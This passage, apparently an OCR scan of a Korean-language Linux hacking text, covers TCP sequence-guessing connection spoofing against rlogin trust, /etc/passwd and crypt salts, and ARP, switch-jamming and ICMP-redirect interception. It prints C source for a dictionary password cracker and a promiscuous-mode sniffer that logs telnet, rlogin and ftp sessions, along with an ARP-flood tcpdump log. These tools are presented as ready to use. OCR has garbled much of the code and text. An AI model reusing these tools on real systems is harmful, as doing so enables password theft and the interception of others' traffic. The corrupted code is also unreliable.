sendtcppacket (& ( eh . ether _ shost ) ，& ( eh . ether _ dhost ) ， trust _ addr , targ _ addr , 
port , 514, seq +4, next _ seq +4, TM _ RST , NULL , 0); 


main ( argc , argv ) 

{ . 

/* initialization of the packet */ 

init_filter (’’ tcp f ', NULL ) ； 

/* trusted host 의 513 번 포구에 대 해 flooding 공격 시 작 */ 
hose _ trusted ( argv [ l ] , trust _ addr , seq _ num , port _ num ) ； 

/* guessing Sequence Number */ 
det _ seq ( argv [2], targ _ addr , & next _ seq , ^ offset ) ； 

/* 실제 속이 기한 련결을 시 작. 이때국1는 다음순서 번호를 알고있다.*/ 

spoof_conn ( trust _ addr , argv [2] , targ _ addr , next _ seq ) ； 

/* 모든 련결을 재설정 */ 

reset_trusted (argv [1] ， trust _ addr , seq _ num , port _ num ) ； 
exit (0) ； 
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一 사용자계정 획득 

가장 쉬운 방법은 통과암호가 없는 계정 이 나 guest , anonymous 와 같은 가명계정 혹 
은 사용자의 허락없이 알아낸 계정으로 체계에 접근하는 방법이다. 

또 다른 방법은 ftpd , amd , named , rpc 등 취 약점을 가지고있는 봉사를 통하여 접 
근하는 방법 이 다. 

최 근 체 계 들은 취 약점 에 의한 자체 망보안기 능이 강하기 때 문에 우의 방법 들은 현실적 
으로 불가능할수 있다. 

가장 현실적 인 방법 이라고 볼수 있는 방법은 사용자의 통과암호를 알아내는 방법 이다. 
그러면 LINUX 에서 통과암호관리를 어떻게 하며 이것을 어떻게 알아낼수 있는가에 대해 
서 구체적으로 보자. 

통과암호의 관리 

LINUX 체계는 매 사용자들의 통과암호 및 기 타 정 보를 etc/passwd 파일 에 보관하고 
있 다. vi 나 cat 를 리용하여 이 파일 을 고찰해보자. 

NIS 체 계 인 경 우에 는 cat / etc/passwd 나 ypcat/passwd 파일 을 리 용한다. 

Netlnfo 체 계 인 경 우에 는 nidump/passwd 를 리 용한다. 실 례 를 들어 보자. 

root : ## root : 0:0: Supervisor : /: / bin/csh 

daemon : ## daemon : 1:1:: : 

uucp : ## uucp : 4:8:: / var / spool / uucppublic : 

jcj : ## jcj 928 :104:30: Jong Choi Jin : / home / jcj : / usr / local / bin/tcsh 
hyh :## hyhll 3:129:30 :Han Yong Hak : / home / hyh :/ usr / local / bin/tcsh 
kij ：## xtfg ：11529：410 iKim II Jun : / home / kij : / bin/csh 

첫 세 줄은 root , daemon , uucp 라는 체 계 계 정 ( account ) 에 관한 정 보이 고 그 다음에 나 
오는 줄들은 : jcj 나 hyh 같은 체계의 일반 사용자들에 관한 정보이다. 각각 줄은 :을 기준으 
로 다음과 같은 7개의 마당 ( field ) 으로 나누어진다. 

1 Field : 사용자 이름 

2 Field : 사용자의 통과암호(보통 보여주지 않거 나 알아보지 못하게 변형시켜 놓는다.) 

3 Field : 사용자의 ID 번호 ( UID ) 

4 Field : 사용자가 속해있는 그롭의 ID 번호 ( GID ) 

5 Field : 사용자의 실제이 름 

6 Field : 사용자의 홈등록부 

7 Field : 사용자가 사용하는 쉘 

우의 실례 에서 jcj 라는 사용자를 살펴보면 

jcj :## jcj 928:104:30 :Jong Choi Jin ：/ home / jcj :/ usr / local / bin/tcsh 


1 } 
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444^1*： jcj 

통과암호 : ## jcj 928( 의 도적 으로 통과암호 부분을 숨긴 경 우 Shadowing passwd 라고 한다. ) 

UID : 104 

GID : 30 

실제사용자의 이름: Jong Choi Jin 

사용자의 홈등록부: / home/jcj 

사용자가 사용하는 월 : tc 쉘 

통과암호가 어떻게 만들어지는가를 보기 위해 다음의 지령을 실행시켜 보자. 

#/ usr / lib/makekey iakasbells lsDyOcB /5 / zho > 

#/ usr / lib/makekey sakaixvaaa aaxuEmMgYNZz 2> 

두 실행결과를 비교해보자. 

공통점은 입력한 글자중에서 끝에서 두번째부터의 글자는 다음 줄의 암호화된 부분에 
그대로 찍혀 나오고 나머지 부분은 알아보지 못하게 변형되여 나온것을 알수 있다. 

우의 례 에서 입 력 한 단어 iakasbells 의 마지 막 두 글자 Is 와 다음에 변형된 단어 
lsDyOcB /5/ zho 〉 의 첫 Is 와 같다. 

이 마지 막 두 글자들을 열쇠 문자 (key character ) 혹은 salt 라고 한다. 이 런 방식 으로 
가입등록이 름을 입 력 한 후 통과암호를 입 력하면 맨 마지 막의 두번째 글자들을 가지 고 입 
력 한 동과암호를 암호화하고 이 암호화한 자료를 가지 고 / etc / passwd 와 내용을 비 교하여 
옳다면 가입등록에 성 공하게 되 는것 이 다. 

보통 통과암호는 8자를 기준으로 하기때문에 통과암호로 입력한 글자수와 마지막 두 
글자가 중요한 의미를 가지게 된다. 

앞에서도 언급하였지만 충분히 추측할수 있는 통과암호를 사용하면 안된다. 

또한 / etc / passwd 파일로부터 통과암호를 추측하는 도구 (Crack 혹은 Cops ) 를 사용하 
여 알아낼수도 있다. 

이 도구들은 독특한 알고리 듬을 사용하는데 실례 로 사전에 나오는 단어 들이나 ID 를 뒤 
섞 어 대 입 해본다든지 통과암호파일 에 서 알아낸 자료들을 대 입 해 보는 방법 이 다. 물론 대 입 
을 할 때 에는 cryptO 함수를 리 용하여 암호화한 다음 이 결과를 / etc / passwd 파일 에 있는 두 
번째 마당인 변형된 부분과 계속 비교하여 맞는지를 확인하게 된다. 이런 리유로 하여 흔 
히 일상적으로 쓰는 단어들은 적발될 우려가 높은데 적합치 않은 통과암호로서 다음과 같 
은 실례를 들수 있다. 
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적합치 않은 통과암호의 실례를 보면; 

^ ID 와 같은 통과암호 
ᄄ 사용하는 체계의 이름 
^ 를퓨터 이 름 

^ 영어사전에 나오는 단어 ( boss , world …) 

亡군 전 화번 호 

^ 생 일 

^ 건반의 같은 선상에 있는 글자들의 련속 ( qwert，asdf …) 

^ 동일한 글자의 련속(11111 ， eeeee … ) 

등이 있다. 

■과암호를 알아내는 방법 

① crackei •프로그람을 리용하여 통과암호를 알아내 는 방법 

우에서 언급한것처럼 LINUX 체계는 / etc / passwd 라는 파일에 그 체계의 모든 사용자 
들의 이 름， ID ， 암호 등을 적 어놓고 관리한다. passwd 파일을 실제 로 읽어서 암호를 알 
아내면 되는데 이것은 매 사용자별로 한줄씩 구성되 여있다. 

LINUX 체 계 에 서 는 우리 가 가입 등록과정 에 입 력 한 통과암호를 crypt 함수로 암호화를 진 
행 하여 / etc / passwd 파일 과 비 교하여 일 치 하는 경 우에 만 사용을 허 가한다. 

/ etc / passwd 파일은 공개되 기때 문에 crypt 함수를 리용하여 사전의 임 의의 단어를 입 
력하여 암호화된 통과암호를 알아낼 때 까지 무환순환을 돌릴수 있 다. 

아래 에 cracker 프로그람의 실제코드를 보여주었 다. 

이 방법은 passwd 파일에서 암호가 없는 사용자를 찾고 그 다음의 사용자이름과 암호 
가 같은것을 찾고 그다음 사전의 단어들을 비교해가면서 찾는다. 시간이 오래 걸리는 결 
함이 있지만 알고리듬을 갱신하면 더 빠른 cracker 프로그람을 만들수 있다. 


코드 2. 통과암호 cracker 
^include < stdio . h > 
^include < string . h > 


#define fetch ( a , b , c , d ) fgets ( a , 130, b ) ; c = strtok ( a , ”: ”) ； d = strtok ( ， \0 , ， ’’ : ”); 

main () 

{ 

FILE * p ，* o ，* w ; 
char i [50] ； 

char pes [130 ] ， pas [50 ] ， pps [50 ] ， pws [50] ；_ 


錢變邊 錢變變©繼繼 


끝 






Lirnix 당보안 


char * es = pes , * as = pas , * ps = pps , * ws = pws ； 

printf("\nTinyCrack vl.O Bluesman l /95\ n \ n ’’); 

printf( M Password File ： ”); 
gets ( i ) ； 

p = fopen ( i , M r M ) ； 

printf( M WordList File ： ”); 
gets ( i ) ； 

w = fopen ( i , M r M ) ； 

printf ("Results File : ”); 
gets ( i ) ； 

o = fopen ( i , M w M ) ； 

fprintf ( o,PASS 1： NULL PASSWORDS ***\ n n ); 
while ( ps ) 


fetch ( es , p , as , ps ) ； 

if ( ps ) if ( ps [_ l ] == ’:’) fprintf ( o, M | User [% s ] has no password !\ n f ', as ) ； 

} 

fflush ( o ) ； 
rewind ( p ) ； 

fprintf ( o,PASS 2： ACCOUNT NAMES ***\ n n ); 
do 


fetch ( es , p , as , ps ) ； 

if ( ps ) if (! strcmp((char *) crypt ( as , ps ), ps )) 
fprintf ( o, M |User [% s ] has password [% s ]\ n M , as , as ) ； 

} while ( ps ); 
fflush ( o ) ； 

rewind ( p ) ； 

fprintf ( o , n *** PASS 3： DICTIONARY WORDS ***\ n ”); 
do 


rewind ( w ) ； 

fetch ( es , p , as , ps ) ； 

do 



fgets ( ws , 130, w ) ； 
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ws [strlen (ws) _1] = 0; 

if ( ! strcmp ((char *) crypt (ws, ps), ps)) 

{ ᅳ : 

fprintf(o, M | User [%s] has password [%s]\n",as, ws) ； 
fflush(o) ； 
break ； 

} 

} while (!feof(w)); 

} while (!feof(p)); 

fprintf(o, ’’*** FINISHED SESSION ***\n”) ； 
exit(l) ； 


② 파케 트엿 듣기 (sniffing) 

가장 심각한 해 킹 기술로서 이써네 트장치를 조종하여 망에서 흐르는 파케트를 수집하 
여 원하는 정보를 알아내는 방법 이다. 

하나의 체계가 공격당하게 되면 그 체계를 리용하여 망흐름을 엿듣게 되고 다른 체계 
의 사용자 ID 및 통과암호를 알아내 게 된 다. 비 록 교환기환경 의 망을 구축하여 엿 듣기 를 
어 렵게 할수는 있지 만 이것 을 우회할수 있는 많은 공격방법 이 존재한다. 

엿듣기의 원리 

LAN 상에서 개별호스트를 구별하기 위하여 이써네트대면부는 MAC (Media Access 
Control) 주소를 가지 게 되 며 모든 이써네 트대 면부의 MAC 주소는 서 로 다른 값을 가전다. 
따라서 국부망상에서 매개의 호스트는 유일하게 구별될수 있다. 이써네트는 국부망내의 모 
든 호스트가 같은 선 (wire) 을 공유하도록 되 여 있 다. 따라서 같은 망내 의 콤퓨터 는 다른 콤 
퓨터 가 통신하는 모든 망흐름을 볼수 있다. 하지 만 이써네 트를 지 나는 모든 망흐름을 받 
아들이 면 관계 없는 파케 트까지 처 리 해 야 하므로 효률적 이 지 못하고 망의 성 능도 떨 어질 수 
있다. 그래서 이써네 트대 면부 (LAN 카드)는 자신의 MAC 주소를 가지지 않는 망흐름을 무 
시 하는 려과기능을 가지고있다. 이 려과기능은 자신의 MAC 주소를 가전 망흐름만을 보도 
륵 한다. 또한 이써네트대면부에서 모든 망흐름을 볼수 있도륵 하는 기능을 설정할수도 있 
는데 이 것 을 ’’promiscuous” 방식 이 라고 한다. 이 써 네 트대 면부를 이 러 한 ’’promiscuous ’’방 
식 으로 설정하여 국부망을 지 나는 모든 망흐름을 엿 듣기할수 있게 된다. 

교환기 환경 에서의 엿 듣기수법 

일 반적 으로 앞서 설명한 엿 듣기 를 방지하는 방법 으로 교환기 를 사용할수 있 다. 교환 
기는 국부망을 여 러 개의 토막으로 나누어 쓸수 있도륵 하는데 매 토막안에서의 망흐름은 다 
른 토막으로 전 달되 지 않는다. 따라서 교환기 를 리용하여 업 무별 로 또는 독립 적 인 싸이트 
별로 망을 분할하면 다른 망토막안에 서 의 망흐름을 도청할수 없게 된다. 하지 만 Switch 
Jamming, ARP Redirct 나 ICMP Redirct 등의 수법 을 리 용하여 다른 망토막의 자료를 엿 
듣을수 있는 방법도 있다. 
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Switch Jamming 

많은 종류의 교환기 들은 주소표가 가득차게 되 면 ( Full ) 모든 망토막으로 파케 트를 방 
송하게 된다. 따라서 공격자는 위조된 MAC 주소를 지속적으로 망에 흘림으로서 교환기 
의 주소표를 가득차게 하여 다른 망토막의 자료를 엿듣을수 있게 된다. 교환기 들은 사실 
상 보안보다는 기능과 성능위주로 설계되여있다. 

다음은 arp flooding 공격 을 할 때 발생 하는 임 의 의 ARP 파케 트를 tcpdump 로 수집 한 
것이다. 공격자가 만들어낸 이러한 임의의 AHP 파케트의 MAC 주소는 교환기의 주소표를 가 
득차게 한다. 


[rootSconsult / root ] # tcpdump _e arp 




tcpdump : listening 

on ethO 




07:44:23.898915 

79：94：74： ll ： d 7 ：dc 

bc ：47： d 8：7 b ：31：51 

arp 42： arp reply 

82.195.6.82 

is_at 

79：94：74： ll ： d 7 ：dc 

07:44:23.898954 

b 8：29：3：9 c ：9 e ：5 c 

3 f ： cf ：9 b ：70： fa ：14 

arp 

42： arp reply 

204.227.135.56 


is~at 


b 8：29：3：9 c ：9 e ：5 c 

07:44:23.898991 

5：6 f ：25： db ：4 b ：76 

97： a 0： d 6： c 7： fl ：8 f 

arp 

42: arp reply 

158.81.199.91 

is_at 


5：6 f ：25： db ：4 b ：76 

07:44:23.899027 

f 0： f 4：2 c ：8 f ：50： f 7 

a 6: ca :21 : al : dd :26 

arp 

42： arp reply 

114.215.48.176 


is_at 


f 0： f 4：2 c ：8 f ：50： f 7 

07:44:23.899063 

10：3： l ：5 b ：78：9 f 

de : d 0: b : d 0:60 :fa 

arp 

42： arp reply 

171.63.250.67 


is_at 


10：3： l ：5 b ：78：9 f 

07:44:23.899099 

c 4：8 c ：89：15：83 ：fb 

7 d ： cc ：32：5 b ： f 2：42 

arp 

42: arp reply 

235.178.172.145 


is_at 


c 4：8 c ：89：15：83 ：fb 

07:44:23.899136 

5 d ： f 2：9 d ： d 4：92：49 

5 d ：95： c 2： bd ：8 f ：86 

arp 

42： arp reply 

19.140.139.241 

is_at 


5 d ： f 2：9 d ： d 4：92：49 

07:44:23.899172 

49：19：9 a ： cc ：14：85 

8 c ：49：56：7 e ：8 b ： b 2 

arp 

• 42: arp reply 

127.191.23.251 

is_at 


49：19：9 a ： cc ：14：85 

07:44:23.899209 

71:28:86:3:70:99 

90:4 e : aa :20: d 3: f 2 

arp 

42: arp reply 

143.251.139.236 


is_at 


71:28:86:3:70:99 


ARP Redirect 공격 

IP 주소는 32 bit 크기 로 되 여 있고 이써 네 트주소 (MAC 주소)는 48 bit 의 크기 를 가전다. 다 
른 호스트로 ftp 나 telnet 등과 같은 망련결을 하기 위 해서 는 상대 방호스트의 이써 네 트주 
소를 알아야 한다. 즉 사용자는 IP 주소를 리용하여 련결을 하지 만 이써네 트상에서 는 이 
써네 트주소를 리용하게 된다. 이 를 위하여 IP 주소를 이써네 트주소로 변환시 켜 주어 야 하 
는데 이것을 ARP (Address Resolution Protoml ) 라고 한다. 그리고 그의 반대과정을 
Address Resolution Protocol ) 라고 한다. 
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ARP 를 리 용하여 상대 방호스트의 이써네 트주소를 알아내 는 과정 은 다음과 같다. 

망안의 모든 호스트에 "AHP Request ” 라고 부르는 이써네트프레임을 전송한다. 련결 
하려 는 호스트의 IP 주소를 포함한 ARP Request 는 이써네 트상의 모든 다른 호스트들에 게 
《이 IP 주소를 사용하는 호스트는 나에게 하드웨어주소(이써네트주소)를 알려주시오.》 
라는 의미를 가전다. 

ARP Request 를 받은 호스트중 해 당 IP 를 사용하는 호스트는 자신의 하드웨 어 주소 (이 
써네 트주소)를 AEP Request 를 보낸 호스트에 게 만 보내주게 되는데 이것 을 ARP Reply 
라고 한다. 

다음 두 호스트간의 통신 ( ftp , telnet 등)을 위 하여 상대 방의 이써 네 트주소를 사용하 
게 되며 파케트를 송수신할수 있게 된다. 

M ARP Redirect " 공격은 위조된 arp reply 를 보내는 방법으로 진행될수 있다. 즉 공 
격 자의 호스트가《나의 MAC 주소가 경로기의 MAC 주소이 다》라는 위조된 arp reply 를 
방송주소로 망에 주기적으로 전송하여 교환기망상의 다른 모든 호스트들이 공격자의 호스 
트를 경로기로 믿게 한다. 결국 외부망과의 모든 망흐름은 공격 자의 호스트를 통하여 지 
나가게 되 고 공격 자는 필 요한 정 보를 엿듣을수 있 다. 

ARP spoofing 공격 

ARP redirect 와 비 슷한 공격 방법 으로 다른 토막에 존재 하는 호스트사이 의 망흐름을 엿 
듣으려고할 때 사용된 다. 공격 자는 자신의 MAC 주소를 엿 듣으려 는 두 호스트의 MAC 주 
소로 위 장하는 ARP reply (또는 request ) 파케 트를 망에 전송한다. 즉《 나의 (공격 자의 ) MAC 
주소가 엿듣으려는 호스트의 MAC 주소이 다》라는 ARP reply 를 각각의 호스트에 게 전송 
하게 된다. 이 리 한 ARP reply 를 받은 두 호스트는 자신의 ARP 주소완충기 를 갱 신하게 되 
고 두 호스트사이에 련결이 일어날 때 공격자 호스트의 MAC 주소를 사용하게 된다. 결국 
두 호스트사이 의 모든 망흐름은 공격 자가 위 치 한 토막으로 들어오게 된 다. 

이 러한 경우 ARP redirect 공격과 마찬가지로 공격자의 호스트로 넘 어오는 망흐름 
을 본래의 호스트로 응답해주어야만 두 호스트사이에 정상적인 련결을 할수 있게 되고 엿 
듣기도 할수 있다. 그렇지 않으면 두 호스트사이의 련결은 이루어질수 없게 되고 결국 엿 
듣기도 할수 없게 된다. 

ICMP Redirect 공격 

ICMP (Internet Control Message Protocol ) 는 망오유통보를 전송하거 나 망흐름을 통 
제 하기 위 한 규약인데 ICMP Redirect 를 리 용하여 엿 듣을수 있는 방법 이 존재 한다. ICMP 
Redirect 통보는 하나의 망에 여 러개의 경 로기 가 있을 경우 호스트가 파케트를 옳바른 경 
로기 에 게 보내 도록 알려주는 역 할을 한다. 공격 자는 이 를 악용하여 다른 토막에 있는 호 
스트에게 위조된 ICMP Redirect 통보를 전송하여 공격자의 호스트에로 파케트를 전송하 
도륵 함으로써 파케 트를 엿듣을수 있게 한다. 
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교환기 의 span / monitor 포구를 리용한 엿 듣기 

이 방법 은 교환기 에 있는 monitor 포구를 리 용하여 엿 듣기 할수 있는 방법 이 다. monitor 
포구는 교환기 를 통과하는 모든 망흐름을 볼수 있는 포구로서 망관리 를 위해 만들어 놓은 
것 이지 만 공격 자가 망흐름을 엿 듣기할수 있는 좋은 장소를 제공한다. 

아래 에 교환기 망환경 에 서 sniffing 기 술의 원천코드를 보여 주었 다. 


코드 3.파케트 엿듣기 
^include < stdio . h > 
#include < ctype . h > 
#include < string . h > 


#include 

#include 

^include 

^include 

^include 

^include 

^include 


< sys / time . h > 
< sys / file . h > 
< sys / stropts . h > 
< sys / signal . h > 
< sys / types . h > 
< sys / socket . h > 
< sys / ioctl . h > 


#include < net / if . h > 

#include < net / nit _ if . h > 
#include < net / nit _ buf . h > 
#include < net / if _ arp . h > 

^include < netinet / in . h > 
^include < netinet / if _ ether . h > 
^include < netinet / in _ systm . h > 
^include < netinet / ip . h > 
^include < netinet / udp . h > 
^include < netinet / ip _ var . h > 
#include < netinet / udp _ var . h > 
#include < netinet / in _ systm . h > 
#include < netinet / tcp . h > 
#include < netinet / ip _ icmp . h > 

^include < netdb . h > 

^include < arpa / inet . h > 

# define ERR stderr 


char 



alloc (); 

evice , * ProgName , * LogName ； 
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FILE * LOG ; 
int debugs 0 ； 

#define NIT—DEV Vdev / nit M 

#define CHUNKSIZE 4096 /* 장치완충기크기 */ 

int if_fd = -1 ； 

int Packet [ CHUNKSIZE +32] ； 

void Pexit ( err , msg ) 
int err ； char * msg ; 

{ ᄂ 

perror ( msg ) ； 
exit ( err ) ； 

} 

void Zexit ( err , msg ) 
int err ； char * msg ; 

{ ᄂ 

fprintf ( ERR , msg ) ； 
exit ( err ) ； 

} 

#define IP ((struct ip *) Packet ) 

#define IP_OFFSET ( OxlFFF ) 

#define SZETH ( sizeof(struct ether _ header )) 

#define IPLEN (ntohs ( ip -> ip _ len )) 

#define IPHLEN ( ip -> ip _ hl ) 

#define TCPOFF ( tcph _> th _ o 伴) 

#define IPS ( ip -> ip _ src ) 

#define IPD ( ip -〉 ip _ dst ) 

#define TOPS ( tcph -〉 th _ sport ) 

#define TCPD ( tcph -〉 th _ dport ) 

#define IPeq ( s , t ) (( s ). s_addr == ( t ). s _ addr ) 

#define TCPFL ( FLAGS ) ( tcph —〉 th_flags & ( FLAGS )) 
#define MAXBUFLEN (128) 

time_t LastTIME = 0; 

struct CREC { 

struct CREC * Next , * Last ; 
time_t Time ； /* 시작시간 */ 

struct in_addr SRCip , STip ； 
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u_int SRCport, /* 원천/목적 포구 */ 


DSTport ； 

u_char Data [MAXBUFLEN+2] ； 

u_int Length ； /* 현재 자료길이 */ 


u_int PKcnt ； 
u_long LASTseq ； 

} 

struct CREC *CLroot = NULL ； 

char *Symaddr (ip) 
register struct in_addr ip ； 

{ 

register struct hostent *he = 

gethostbyaddr ((char *) &ip. s_addr, sizeof (struct in_addr ), AF_INET); 
return ( (he) ? (he->h_name) : (inet_ntoa (ip)) ) ； 

} 

char *TCPflags (figs) 
register u_char figs ； 

{ 

static char iobuf[8] ； 

#define SFL(P,THF,C) iobuf[P] = ((flgs & THF)?C: ’- ) 

SFL(0,TH_FIN, F); 

SFL(1,TH_SYN, ’S’); 

SFL(2,TH_RST, R )； 

SFL(3,TH_PUSH, P )； 

SFL(4,TH_ACK, A，); 

SFL(5,TH_URG, U，); 
iobuf[6] =0 ； 
return (iobuf) ； 

} 

char *SERVp(port) 
register u_int port ； 

{ 

static char buf[10] ； 
register char *p ； 

switch (port) 
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case IPPORT_LOGINSERVER : p="rlogin n ; break ； 
case IPPORT_TELNET : p= M telnet" ； break ； 

case IPPORT_SMTP : p=”smtp”; break : 

case IPPORT_FTP : p= n ftp”; break ； 

default : sprintf(buf, M %u M ,port) ； p=buf; break : 

} 

return (p) ； 


char *Ptm (t) 
register time_t *t; 

{ 

register char *p = ctime (t) ； 
p[strlen(p)-6]=0 ； /* strip M YYYYW */ 
return (p) ； 


char *NOWtm() 

{ 

time_t tm ； 
time(&tm) ； 
return ( Ptm(&tm) ) ； 


#define MAX(a’b) (((a) 〉 (b))?(a): (b)) 

#define MIN (a,b) (((a) < (b)) ? (a) : (b)) 

/* 항목추가 */ 

#define ADD_NODE (SIP, DIP, SPORT, DPORT, DATA, LEN) 

{ 

register struct CREC *CLtmp = (struct CREC *) malloc (sizeof(struct CREC)); 
time( & (CLtmp->Time) ) ； 

CLtmp->SRCip. s_addr = SIP. s_addr ； 

CLtmp- 〉 DSTip. s_addr = DIP. s_addr ； 

CLtmp->SRCport = SPORT ； 

CLtmp->DSTport = DPORT ； 

CLtmp->Length = MIN(LEN, MAXBUFLEN) ； 

bcopy( (u_char *)DATA, (u_char *)CLtmp->Data, CLtmp->Length) : 
CLtmp->PKcnt = 1 ； 

CLtmp->Next = CLroot; 

CLtmp->Last = NULL ； 

CLroot = CLtmp ； 
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register struct CREC *GET_NODE(Sip, SP, Dip, DP) 
register struct in_addr Sip,Dip ； 
register u_int SP,DP ； 

{ 

register struct CREC *CLr = CLroot ； 

while (CLr 卜 NULL) 

{ 

if( (CLr->SRCport == SP) && (CLr->DSTport == DP) && 
IPeq(CLr->SRCip,Sip) && IPeq(CLr->DSTip, Dip) ) 


break ； 


CLr = CLr~>Next ； 

} 

return (CLr) ； 

} 

#define ADDDATA_NODE (CL, DATA, LEN) 

{ 

bcopy ((u_char *) DATA, (u_char *) &CL->Data [CL~>Length], LEN) ； 
CL~>Length += LEN ； 

} ᄂ 

# define PR_DATA (dp, In) 

{ 

register u_char lastc=0 ； 
while (In — >0) 

{ 

if(*dp < 32) 

{ 

switch (*dp) 


case ’\0’: if((lastc== ， \r ， ) || (lastc==’\n’) || lastc == ’\0’) 


break ； 
case ’\r’: 

case ’W: fprintf(LOG, M \n : ”); 
break ； 


default : fprintf(LOG," %c", (*dp + 64)); 


break ； 
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if(isprint(*dp)) fputc(*dp, LOG) ； 
else fprintf(LOG, ’’ (%d) ’ 、 *dp) ； 

} 

lastc = *dp ++； 

} 

fflush(LOG); 

} 

void END_NODE (CLe, d, dl, msg) 
register struct CREC *CLe ； 
register u_char *d; 
register int dl ； 
register char *msg ； 

{ 、 

fprintf(LOG, M \n— TCP/IP LOG — TM ： %s —\n M , Ptm(&CLe->Time)) : 
fprintf(LOG, M PATH ： %s(%s) = 〉，、 Symaddr(CLe->SRCip), 

SERVp (CLe->SRCport)); 

fprintf(LOG, M %s (%s) \n M , Symaddr (CLe->DSTip), SERVp (CLe->DSTport)); 
fprintf(LOG, M STAT: %s, %d pkts, %d bytes [%s]\n M , 

NOWtmO ， CLe->PKcnt, (CLe->Length+dl), msg) ； 
fprintf(LOG, M DATA ： M ) ； 

{ 

register u_int i = CLe~>Length ； 
register u_char *p = CLe_ 〉 Data; 

PR_DATA(p,i )； 

PR_DATA(d, dl) ； 


fprintf(LOG, ”\n— \n”); 
fflush(LOG); 

if(CLe->Next 卜 NULL) 

CLe- 〉 Next_〉Last = CLe~>Last ； 
if(CLe->Last 卜 NULL) 

CLe->Last~>Next = CLe~>Next ； 
else 

CLroot = CLe_ 〉 Next; 
free(CLe) ； 


/* 30 mins (x 60 seconds) */ 
#define IDLE_TIMEOUT 1800 
Mefine IDLE_NODE() 
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time_t tm ； 
time(&tm) ； 
if(LastTIME<tm) 

{ 

register struct CREC *CLe，*CLt = CLroot ； 
LastTIME=(tm+IDLE_TIMEOUT); tm-=IDLE_TIMEOUT; 
while (CLe=CLt) 

{ 

CLt=CLe->Next ； 
if(CLe~>Time <tm) 

END_NODE(CLe, (u_char *)NULL, 0, "IDLE TIMEOUT”) ； 


void filter (cp, pktlen) 
register char *cp ； 
register u_int pktlen ； 

{ 

register struct ip *ip; 

register struct tcphdr *tcph ； 

{ 

register u_short EtherType=ntohs (((struct ether_header *)cp)->ether_type) ； 


if(EtherType < 0x600) 


EtherType = * (u_short *) (cp + SZETH + 6); 
cp+=8 ； pktlen_=8; 


if(EtherTVpe 卜 ETHERTYPE_IP) /* IP 규약인가를 검사 */ 


return ； 


bcopy(cp + SZETH, (char *)Packet, (int) (pktlen - SZETH)) ； 


ip = (struct ip *)Packet; 

if( ip->ip_p 卜 IPPROTO.TCP) /* TCP 규약인가를 검사 */ 


return ； 


tcph = (struct tcphdr *) (Packet + IPHLEN) ； 
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if(!( (TCPD == IPPORT_TELNET) | | (TCPD == IPPORT_LOGINSERVER) || 
(TCPD == IPPORT_FTP))) 
return ； 


register struct CREC *CLm; 

register int length = ((IPLEN - (IPHLEN * 4)) - (TCPOFF * 4)); 
register u_char *p = (u_char *)Packet; 

p += ((IPHLEN * 4) + (TCPOFF * 4)); 

if (debug) 

{ ᄂ 

fprintf(LOG, M PKT ： (%s %04X) M , TCPflags (tcph->th_flags), length) : 
fprintf(LOG, M %s[%s] => M , inet_ntoa(IPS), SERVp(TCPS)) ； 
fprintf(LOG, M %s[%s]\n ? ', inet_ntoa(IPD), SERVp (TCPD)); 


if( CLm = GET_NODE(IPS, TCPS, IPD, TCPD) ) 

{ 

C Lm- > PKcnt++ ； 
if(length>0) 

if( (CLm->Length + length) < MAXBUFLEN ) 

{ 

ADDDATA_NODE( CLm, p,length); 

} 

else 

{ 

END_NODE( CLm, p, length, "DATA LIMIT") ； 

} 

if (TCPFL (TH_FIN | TH_RST)) 

{ 

END_NODE(CLm, (u_char *) NULL, 0, 

TCPFL(TH_FIN) ? M TH_FIN M : M TH_RST M ); 

} 

} 

else 

{ 

if(TCPFL(TH_SYN)) 

{ 

_ADD_NODE(IPS, IPD, TCPS, TCPD, p, length) ; 
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IDLE_NODE ()； 


/* 신호처 리 */ 
void death () 

{ 

register struct CREC *CLe ； 
while (CLe=CLroot) 

END_NODE( CLe, (u_char *)NULL,0, "SIGNAL") : 

fprintf(LOG, M \nLog ended at =、> %s\n M , NOWtmO) ； 
fflush(LOG); 
if (LOG 卜 stdout) 
fclose (LOG) ； 
exit(l) ； 

} 

/* 망대면부를 열고 ioctl 함수를 실행 */ 
void do_it () 

{ 

int cc ； 
char *buf ； 
u_short sp_ts_len ； 

if(! (buf^malloc (CHUNKSIZE))) 

Pexit (1 ， ’’ Eth : malloc ’’) ； 

{ 

struct strioctl si; 

struct ifreq ifr ； 

struct timeval timeout ； 

ujnt chunksize = CHUNKSIZE ； 

ujong if 一 flags = NI.PROMISC ； 

if((if_fd = open(NIT_DEV, 0_RD0NLY)) < 0) 

Pexit(1 ， ’’Eth: nit open”); 


if (ioctl (if_fd, I_SRDOPT, (char *)RMSGD) < 0) 
乂 Pexit(1, "Eth ： ioctl (I_SRDOPT) M ) ； 
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si. ic_timout = INFTIM ； 


if(ioctl(if_fd, I_PUSH, M nbuf M ) < 0) 

Pexit(l, M Eth ： ioctl (I_PUSH \ M nbuf\ M ) ? ') ； 


timeout. tv_sec = 1; 

timeout. tv_usec = 0; 

si. ic_cmd = NIOCSTIME ； 

si. ic_len = sizeof(timeout) ； 

si. ic_dp = (char *)&timeout ； 

if (ioctl (if_fd, I_STR, (char *)&si) < 0) 

Pexit(l ， ’’Eth: ioctl (I_STR: NIOCSTIME)，，); 

si. ic_cmd = NIOCSCHUNK ； 

si. ic_len = sizeof(chunksize) ； 

si. ic_dp = (char *) Schunksize ； 

if (ioctl (if_fd, I_STR, (char *)&si) < 0) 

Pexit(l, M Eth: ioctl (I_STR: NIOCSCHUNK) M ) ； 

strncpy(ifr. ifr_name, device, sizeof(ifr. ifr_name)); 

ifr. ifr_name [sizeof (ifr. ifr_name) - 1] = ’ \0 ’ ; 

si. ic_cmd = NIOCBIND ； 

si. ic_len = sizeof (ifr) ； 

si. ic_dp = (char *)&ifr ； 

if (ioctl (if_fd, I_STR, (char *)&si) < 0) 

Pexit(l, M Eth ： ioctl (I_STR: NIOCBIND )")； 

si.ic_cmd = NIOCSFLAGS ； 

si. ic_len = sizeof(if_flags) ； 

si. ic_dp = (char *) &if_flags ； 

if (ioctl (if_fd, I_STR, (char *)&si) < 0) 

Pexit(l, M Eth ： ioctl (I_STR: NIOCSFLAGS)”); 

if (ioctl (if_fd, I_FLUSH, (char *)FLUSHR) < 0) 
Pexit(l, M Eth ： ioctl CLFLUSH)”); 

} 

while ((cc = read(if_fd, buf, CHUNKSIZE)) 〉= 0) 

{ 

register char *bp = buf, 

*bufstop = (buf + cc) ； 
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while (bp < bufstop) 

{ 

register char *cp = bp ； 
register struct nit_buflidr *hdrp ； 

hdrp = (struct nit_buftid;r *)cp ； 
cp += sizeof (struct nit_buftidr) ； 
bp += hdrp->nhb_totlen ； 
